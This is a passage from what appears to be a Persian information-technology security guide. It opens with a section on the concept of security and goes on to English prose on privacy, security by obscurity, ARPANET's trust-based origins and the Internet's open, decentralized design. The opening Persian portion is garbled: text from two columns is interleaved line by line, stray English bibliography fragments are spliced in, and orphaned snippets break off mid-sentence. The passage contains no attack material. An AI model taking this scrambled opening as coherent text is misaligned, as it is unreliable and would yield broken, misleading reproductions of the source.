ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺣﻴﺎﺗﻲ ﺍﺳﺖ. the Communications Revolution will Change
our Lives, Harvard Business School Press
ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ،ﺍﻣﻨﻴﺖ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔـﻆ ﺑﻘـﺎ؛ (1997).
22 Millennium Development Goals
ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧـﺎﺕ ،ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻜﻲ ﺍﺯ ﺳﻪ ﻣﻮﺿـﻮﻉ ﺍﺻـﻠﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ۲۳
ﺗﺄﻣﻴﻦ ﻏﺬﺍ. ﺍﺟﻼﺱ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺲ ﺧـﻮﺩ ﺩﺭ ﺟﻨـﻮﺍ )ﺩﺳـﺎﻣﺒﺮ
(۲۰۰۳ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎﺯ ﻫﻢ ﺩﺭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳـﻞ (۲۰۰۵
ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﺷﻮﺩ .ﺍﻳﻦ ﻳﻚ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻦ ﻭﺍﻗﻌﻴـﺖ ﺍﺳـﺖ ﻛـﻪ
ﻧﻘﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺭ ﺗﻮﺳـﻌﻪ ﺑﺘـﺪﺭﻳﺞ ﺑـﻪ ﺟﺎﻳﮕـﺎﻩ
24 Crackers ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﻧﺰﺩﻳﻜﺘﺮ ﻣﻲﺷﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٢
ﺗﻌﻴﻴﻦ ﺳﺮﻧﻮﺷﺖ ﺭﺍ ﺑﺎ ﺑﻴﻤﻪ ﺟﺒﺮﺍﻥ ﻣﻲﻛﻨـﻴﻢ ﺗـﺎ ﻣـﺎ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ
ﺍﺛﺮﺍﺕ ﻣﻨﻔﻲ ﻣﺎﻟﻲ ،ﺣﻮﺍﺩﺙ ﻭ ﺑﻴﻤﺎﺭﻳﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻨﺪ. ﻋﻤﻮﻣﹰﺎ ﺑﺮﺍﻱ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻣﻄﺮﺡ ﻧﺒـﻮﺩ .ﺑـﺎ ﭘﻴـﺸﺮﻓﺖ
ﺗﻤﺪﻥ ،ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺖ ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﺍﺑﻌـﺎﺩ ﻭﺳـﻴﻌﺘﺮﻱ ﻣﺎﻧﻨـﺪ ﺩﺭ
ﺍﻳﻦ ﻣﻘﺪﻣﻪ ﺣﻘﻴﻘﺘﻲ ﺭﺍ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﭘﻴﺶ ﺭﻭﻱ ﻣﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ:
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺁﺳﺎﻳﺶ ﻭ ﺯﻧﺪﮔﻲ ﺑﻲﺧﻄـﺮ ﺭﺍ ﺩﺭ ﺑـﺮ
ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻭﺍﻗﻌـﻲ ﻭ ﭼـﻪ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﮔﺮﻓﺖ ﻭ ﺍﻣﺮﻭﺯﻩ ﻣﻔﻬﻮﻡ ﺍﻣﻮﺍﻝ ﺷﺨﺼﻲ ﻧﻴﺰ ﺑـﻪ ﺗﻌﺮﻳـﻒ ﺍﻣﻨﻴـﺖ
ﻏﻴﺮﻣﻤﻜﻦ ﻭ ﻣﺤﺎﻝ ﺍﺳﺖ؛ ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ
ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﻛــﺎﻓﻲ ﻣﻨﺎﺳــﺐ ﺑﺎﺷــﺪ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﺷــﺮﺍﻳﻂ ﻣﺤﻴﻄــﻲ
ﺩﺳﺖﻳﺎﻓﺘﻨﻲ ﻣﻲﺑﺎﺷﺪ. ﺑﻴﺸﺘﺮ ﺁﻧﭽﻪ ﻛﻪ ﻣﺎ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﻢ ﺑﺎ ﻣﺨـﺎﻃﺮﻩ
ﻫﻤﺮﺍﻩ ﺍﺳﺖ؛ ﻫﺮﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻤﺎﻥ ﻣﺨﺎﻃﺮﺓ ﻛﻤﻲ ﺩﺭ
ﻲ
ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﻘـﻮﻳﺘ ﹺ
ﻼ ﻭﻗﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺷﺨﺼﻲ ﻧﺎﺁﺷﻨﺎ ﺑﻪ ﺳﻔﺮ ﻣﻲﺭﻭﻳـﻢ ﭘﻲ ﺩﺍﺭﺩ .ﻣﺜ ﹰ
ﺍﻓﺰﺍﻳﺶ ﻭ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻣﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻴﺰﻳﻜـﻲ
ﻭ ﻳﺎ ﺑﻪ ﺷﻬﺮ ﻳﺎ ﻛﺸﻮﺭﻱ ﻧﺎﺁﺷﻨﺎ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﻳﻢ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﺭﺍ
ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻴﻢ :ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺑﻠﻨﺪ ﻭ
ﻣﺴﺘﺤﻜﻢ ﻭ ﺩﺭﻫﺎﻱ ﻣﺤﻜـﻢ ﻭ ﻧﻔﻮﺫﻧﺎﭘـﺬﻳﺮ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﻗﻔﻠﻬـﺎ ﻭ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺟـﺴﻤﻲﻣـﺎﻥ ﺗﻬﺪﻳـﺪﺍﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﻛﻠﻴﺪﻫﺎﻱ ﺑﻲﺷﻤﺎﺭ .ﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺩﻳﮕﺮ ﻣﺜﻞ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻭﻗﺘﻲ ﺟﺪﻱ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻛـﻪ ﻣـﺎ
ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺩﻳﮕـﺮ ﻣﻮﺍﻧـﻊ ﺟﺪﺍﺳـﺎﺯ ﻧﻴـﺰ ﺗﻜﻴـﻪ ﻛﻨـﻴﻢ .ﻫﻤﭽﻨـﻴﻦ ﺩﺭ ﻣﻜﺎﻧﻲ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﻢ ﻭ ﺑﺎ ﻓـﺮﺩﻱ ﺭﻭﺑـﺮﻭ ﺷـﻮﻳﻢ
ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﻭﻱ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻧﻔﻮﺫ ﻣـﻲﺭﻭﺩ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻣﻮﻗﻌﻴﺖ ﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺍﮔﺮ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ
ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻃﺮﺍﻑ ﺧـﻮﺩ ﺗﻮﺟـﻪ ﻛﻨـﻴﻢ ﻣﻮﻓـﻖ ﺧـﻮﺍﻫﻴﻢ ﺷـﺪ
ﻧﻮﺭ ﻛﺎﻓﻲ ﻣﺘﻤﺮﻛﺰ ﻛﻨﻴﻢ .ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣﻲﺗﻮﺍﻥ ﺑﺎ
ﻼ ﻫﻤﺮﺍﻩ ﻛـﺴﻲ ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﭘﻴﺪﺍ ﻛﻨﻴﻢ ﻳﺎ ﺭﺍﻩ ﭼﺎﺭﻩﺍﻱ ﺑﻴﺎﺑﻴﻢ؛ ﻣﺜ ﹰ
ﺍﻳــﻦ ﻓــﺮﺽ ﻛــﻪ ﺍﻗــﺪﺍﻣﺎﺕ ﻧﻔــﻮﺫﻱ ﺍﻭﻟﻴــﻪ ﻣﻮﻓــﻖ ﺑﺎﺷــﻨﺪ ﺍﺯ
ﺷﻮﻳﻢ ﻛﻪ ﻣﺎ ﺭﺍ ﺑﻪ ﻣﻜﺎﻥ ﺍﻣﻨﻲ ﻫﺪﺍﻳﺖ ﻛﻨـﺪ ،ﻳـﺎ ﻳـﻚ ﺗﺎﻛـﺴﻲ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﻭ ﻣﺤﺎﻓﻈﻬﺎﻱ ﻗﻮﻳﺘﺮ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻛﺴﺎﻧﻴﻜﻪ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ .ﻣﻬﻤﺘـﺮ ﺑﮕﻴﺮﻳﻢ.
ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻭ ﺟﺰﺍﻳﻲ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﻛﺎﺭﻫﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺭﻭﺍﻧﺸﻨﺎﺧﺘﻲ ﻳﺎ ﻣﺎﻟﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧـﺪ
ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻧﻴﺰ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻴﻢ. ﻭﻟﻲ ﻣﺨﺎﻃﺮﺓ ﺟﺴﻤﻲ ﻧﺪﺍﺭﻧﺪ .ﻭﻗﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻲﻛﻨـﻴﻢ )ﺩﺭ
ﻫﺮﻳﻚ ﺍﺯ ﺍﺷﻜﺎﻝ ﺧﺮﻳﺪ ﺯﻣﻴﻦ ،ﺳﻬﺎﻡ ﻳﺎ ﺣﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺩﺭ ﺗﺠﺎﺭﺕ ﻭ ﻳﺎ ﻛـﺎﺭ ﺩﺭ
ﻻ ﺍﺯ ﭼﻨﺪﻳﻦ ﺭﻭﺵ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺧـﻮﺩ ﻣﺎ ﻣﻌﻤﻮ ﹰ
ﺑﺎﺯﺍﺭ( ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﻢ ﻛﻪ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪ ﻫﺮﭼﻪ ﺯﻭﺩﺗﺮ ﺑﻪ ﻣـﺎ ﺑـﺎﺯﮔﺮﺩﺩ.
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﻧـﺸﺪ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﻲﺩﺍﻧﻴﻢ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺩﻳـﺮ ﻳـﺎ ﺯﻭﺩ
ﺩﻳﮕﺮﻱ ﺧﻼﺀ ﺁﻧﺮﺍ ﭘﺮ ﻛﻨﺪ .ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﻛﻠﻴﺪﻫﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺖ ﻭ
ﺑﺎﺯﺧﻮﺍﻫﻨﺪ ﮔﺸﺖ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺑﻌﻀﻲ ﺍﺯ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺍﻳﻨﮕﻮﻧـﻪ
ﻞ ﺩﺭ ﺍﺯ ﺁﻥ ﭘﺲ ﺣﻔﺎﻅ ﻣﻄﻤﺌﻨﻲ ﺑﻪ ﺷﻤﺎﺭ ﻧﻤﻲﺭﻓﺖ ،ﻣﻲﺗﻮﺍﻥ ﻗﻔ ﹺ
ﻼ ﻭﻗﺘﻲﻧﻴﺴﺘﻨﺪ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻫﻢ ﺑﻪ ﺯﻳﺎﻥ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ .ﻣﺜ ﹰ
ﺍﺯ ﻋﻼﺋﻢ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺧﻄـﺮ ﻧﻔـﻮﺫ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ.
ﺑﺎ ﺷﺨﺺ ﺟﺪﻳﺪﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻴﻢ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﻛـﻪ ﺍﻳـﻦ
ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺯﻫﺎ ﻭ ﻋﻮﺍﻣﻞ ﺳﺪﻛﻨﻨﺪﻩ ﺑﻪ ﺍﺭﺯﺵ ﭼﻴﺰﻱ ﻛﻪ ﻣـﻮﺭﺩ
ﺭﺍﺑﻄﺔ ﺟﺪﻳﺪ ﺑﺮﺍﻳﻤﺎﻥ ﺁﻭﺭﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻫﺮﭼﻨـﺪ ﺧﻄـﺮ ﺍﻳـﻦ
ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻭ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﻣﻌﻘﻮﻻﻧـﻪﺍﻱ ﻛـﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﻣﺴﺌﻠﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻳـﻦ ﺭﺍﺑﻄـﻪ ﺍﺯ ﻓﺎﻳـﺪﺓ ﻻﺯﻡ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﺣﻤﻠﻪ ﺑﻪ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ.
ﻧﺒﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﻣﻲﭘﺬﻳﺮﻳﻢ.
ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻭ ﺭﻭﺷـﻬﺎﻱ ﺣﻔـﺎﻇﺘﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺑـﻪ
ﺩﺭ ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ
ﺷﻜﻠﻲ ﺩﻳﮕﺮ ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺎ ﺑﻪ ﺁﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ ﺑـﺎ ﺗـﺪﺍﺑﻴﺮ
ﻼ ﻫﻤﻴـﺸﻪ ﻣـﺎﻳﻠﻴﻢ ﻋﻤـﺮﻱ ﻃـﻮﻻﻧﻲ ﻭ ﺩﺍﺭﻳﻢ ﻣﻤﻜﻦ ﻧﻴﺴﺖ .ﻣﺜ ﹰ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ ﺑﺎ ﻣﺎﻫﻴﺖ ﺁﻧﻬـﺎ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﺟﺴﻤﻲ ﺳﺎﻟﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ؛ ﻭﻟﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﻣﻌـﺪﻝ ﺁﻣـﺎﺭﻱ
ﺁﺷﻨﺎ ﻧﻴﺴﺘﻴﻢ ،ﺍﻣﺎ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﻢ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﻃﻮﻝ ﻋﻤﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﺮﺍﻱ
ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ،ﺭﻭﺵ ﻛـﺎﺭﺑﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺻﺪﻕ ﻧﻤﻲﻛﻨﺪ .ﺑﻌﻀﻲ ﺍﺯ ﻣـﺎ ﺩﺭ ﺳـﻨﻴﻦ ﭘـﺎﺋﻴﻦ
ﺑﺪﺍﻧﻴﻢ .ﻫﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻭ ﻫﻢ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ
ﻣﻲﻣﻴﺮﻳﻢ ،ﺗﻌﺪﺍﺩﻱ ﺩﺭ ﻃﻮﻝ ﺣﻴﺎﺕ ﺑﺎ ﺑﻴﻤﺎﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺳـﺖ
ﺣﻔﺎﻇﺖ ﻭ ﺩﻓﺎﻉ ﺍﺯ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺩﻳﮕﺮﺍﻥ ﻭ
ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻴﻢ ،ﻭ ﺑﺮﺧﻲ ﺗﺎ ﺳﺎﻟﻴﺎﻥ ﺩﺭﺍﺯ ﺯﻧﺪﻩ ﻣﻲﻣـﺎﻧﻴﻢ ﻭ
ﺩﺭﺻــﻮﺭﺕ ﻣﻮﻓﻘﻴــﺖﺁﻣﻴــﺰ ﺑــﻮﺩﻥ ﺣﻤــﻼﺕ ،ﺑــﺎﺯﭘﺲﮔﻴــﺮﻱ
ﻋﻤﺮﻱ ﺑﻪ ﺳﻼﻣﺖ ﺭﻭﺯﮔﺎﺭ ﻣﻲﮔﺬﺭﺍﻧﻴﻢ .ﻋـﺪﻡ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺩﺭ
ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﻣﻲﺑﺎﺷﻴﻢ.
٣٣ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
Definitions and explanations found in dictionaries and glossaries for the word "security" point to things that with

place on the Microsoft website to fix this flaw ...."

vendors we take action, and this is the only countermeasure at our disposal.

In the real world we know how to protect our information resources, and we also know that some information must be kept confidential while some can be passed on freely. To this end we lock office doors and filing cabinets, and may even keep copies of important information off the office premises so that it is protected in events such as fire or other natural disasters. Some information can be passed on to only a limited number of people, and depending on how important the information is, different people can be trusted to different degrees.

Conceptually there is no difference between the nature of threats in cyberspace and that of threats in the real world; rather, the difference between the two stems from the characteristics of the electronic space and of the threats in this domain, which make it possible to prevent them and neutralize them, or to detect and remedy them.

The topics of privacy [33] and confidentiality [34] are related to the issue of security. Information regarded as "private" can truly remain private only if it is stored securely. In the real world, for this purpose, we behave as if such information did not exist. This policy is called security by obscurity [35]. Likewise, information that has to be shared confidentially must remain secure for those who have shared it. If these people are not always in the same place, adequate security policies must be applied to the information while it is being transferred.

Situations like this exist in cyberspace too, but given the particular nature of cyberspace and the connections between the computers in it, security by obscurity, or relying on concealment, looks like a weak policy and should be avoided. This book presents, at various levels of detail, the security measures needed in cyberspace.

The Emergence and Growth of the Internet

The computing and networking environment of today's Internet originally came into being for the purposes of research and education. When ARPANET (the early Internet) was first created, its main goal was to share the resources of numerous groups of researchers in different geographic locations. These groups had the same goals and worked with the aim of sharing resources and data; access to the network was limited to the members of these groups, and so at that time there was little concern about securing information. The design of the World Wide Web took shape on the same basis, to be a powerful tool for discovering information resources and making them available to others, without using any mechanism for obtaining authorization or facilitating financial investment.

The culture of information sharing among researchers and academics was introduced through ARPANET during the 90s, and traces of it can still be seen. On the basis of this culture, information on the World Wide Web is, as far as possible, accessible and free, and hundreds of millions of people around the world are able to use it. This is very important, and it answers the question of why the Internet has grown to its present level. The ethical side of this culture can be seen in the everyday conversations of people who describe the Internet as a very good and reliable source, because they have seen the media power of the Internet and the effects of working with it. It is sometimes said of the nature of the Internet that "information in it wants to be free".

Another explanation for the Internet's present vulnerabilities is that the first generation of the Internet was built on mutual trust, and users openly trusted one another in order to work together. With the vast expansion of the Internet and the arrival of more people with different interests and goals, mutual trust lost its meaning. At present, one of the major topics on the Internet is the development of a new concept of mutual trust

33 Privacy
34 Confidentiality
35 Security By Obscurity
in a way that is effective, realistic and easy to implement.

The Internet differs from the communication systems that preceded it in several fundamental ways, each of which is significant in its own right. Some of these differences are easier to understand when we compare the Internet with the public switched telephone network (PSTN) [36], which is used every day all over the world.

The Internet operates on a model of information transfer called packet switching. Whenever information travels across the Internet it is broken into several data packets. These packets are encoded, each is sent across the network independently, and they are reassembled after being received at the destination (the routes they take may differ). This method of transfer is the opposite of circuit switching, which the PSTN uses. In circuit switching a single circuit is dedicated to each telephone call, and so the volume of voice carried at any given moment does not matter.

The Internet is a dumb medium, because all it knows is that it must deliver a packet from a source connected to the network to a destination connected to the network. All Internet services [37] end up, at the ends and edges, at computers that are connected to the network. In the PSTN, by contrast, the network's operation is based on "intelligence", and the user's device at the endpoints does little more than let the user speak or listen.

The Internet is global: it connects many countries, and through it information flows across geographic borders to all kinds of people. This is its most prominent and most interesting characteristic, though it has little to do with security. The PSTN is global too, but reaching different countries by telephone is not as easy as on the Internet; a telephone user, for example, knows that they have called a foreign country, whereas someone accessing a website has no need to know where in the world its server is located.

The Internet is open. It can be regarded as a network of networks: any network that belongs to the TCP/IP [38] family of protocols can connect to it and be counted as part of it. The standards that define this protocol suite are issued by the IETF [39], and their informal technical body of work is usually developed on the basis of technical meritocracy and the implementation of consensus standards.

The Internet is decentralized. It has no central communication system, and as long as you follow its core protocols, such as TCP/IP, you can connect your computer or network to the Internet.

The Internet is ubiquitous and the barriers to entry are low. The amount of bandwidth [40] (the speed at which you can transfer data) depends on the carrying capacity of the copper wires, fiber links or satellite channels along the transmission path. Its backbone involves no scarce electromagnetic spectrum. Wherever radio spectrum is used, as in wireless local area networks (WLANs) [41], usually referred to as Wi-Fi, the relevant rules and protocols create a shared environment that makes access simple.

The Internet is relatively inexpensive for average users in parts of the world where local telephone calls are free. The cost of Internet access over telephone lines, in Internet cafés and at other public access points in these countries is very low, and as a result access to the Internet is much easier for a large percentage of the world's population.

The Internet has removed the barrier between author and publisher. You can be a publisher and set up network services on your own computer; all it takes is for your computer to be permanently connected to the Internet. You can also decide which services you offer, and anyone else, provided they are connected to the Internet and have obtained permission from

36 Public Switched Telephone Network
37 Internet Services
38 Transmission Control Protocol/Internet Protocol
39 Internet Engineering Task Force
40 Bandwidth
41 Wireless Local Area Networks
you, can connect to your computer and use its services. The Internet can be controlled and eavesdropped on by users, but in many countries you can choose whether or not your messages and other transmitted data are encrypted to counter eavesdropping.

In addition, filtering of messages is under your control, although you can ask an external party to do it for you; for example, you can ask your ISP to filter out unwanted messages according to rules that you define yourself.

The Internet is an interactive medium. You can view several websites quickly and easily, or receive electronic messages from, and send them to, a great many people. Because the waiting time for online services depends on the bandwidth of your connection, receiving a response from these services may take a little while.

The Internet can be vulnerable, because it was originally founded on providing services to cooperating and relatively similar groups of people, and instead of using reliable authentication mechanisms, everyone on it was trusted. This book introduces you to the Internet's vulnerabilities and presents a set of security best practices to help you reduce them.

Given the characteristics above, you should by now have a picture of the Internet as a place where any kind of activity is permitted and nothing is restricted or under control. This openness clearly reflects the Internet's research and academic roots and demonstrates its benefits for all parts of society. The Internet was not designed with the aim of providing security; it came into being to increase the fruits of joint activity. This degree of freedom creates opportunities for people to abuse networks and inflict serious harm on others. We must first understand the nature of this kind of abuse and then secure our networks against it.

Issues in the Field of Information Security

